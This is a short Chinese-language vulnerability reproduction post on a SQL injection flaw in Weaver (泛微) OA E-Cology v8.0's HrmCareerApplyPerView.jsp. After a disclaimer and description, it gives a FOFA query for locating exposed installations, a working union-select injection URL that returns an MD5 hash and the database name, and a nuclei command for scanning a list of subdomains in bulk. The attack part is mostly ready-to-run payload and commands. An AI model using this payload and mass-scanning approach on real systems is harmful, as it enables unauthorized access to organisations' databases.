0x01 阅读须知
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
泛微新一代移动办公平台e-cology8.0不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology v8.0平台HrmCareerApplyPerView.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取数据库权限。
0x03 漏洞复现
fofa:[AppleScript] 纯文本查看 复制代码 app="泛微-协同办公OA"
1.使用POC查询md5加密的abc和库名,得到回显
[AppleScript] 纯文本查看 复制代码 http://{{Hostname}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1+union+select+1%2c2%2csys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'abc'))%2cdb_name(1)%2c5%2c6%2c
2.nuclei验证已发表于知识星球
[AppleScript] 纯文本查看 复制代码 nuclei.exe-tFanWeiOA_E-Cology_HrmCareerApplyPerView_SQL.yaml-lsubs.txt-stats
|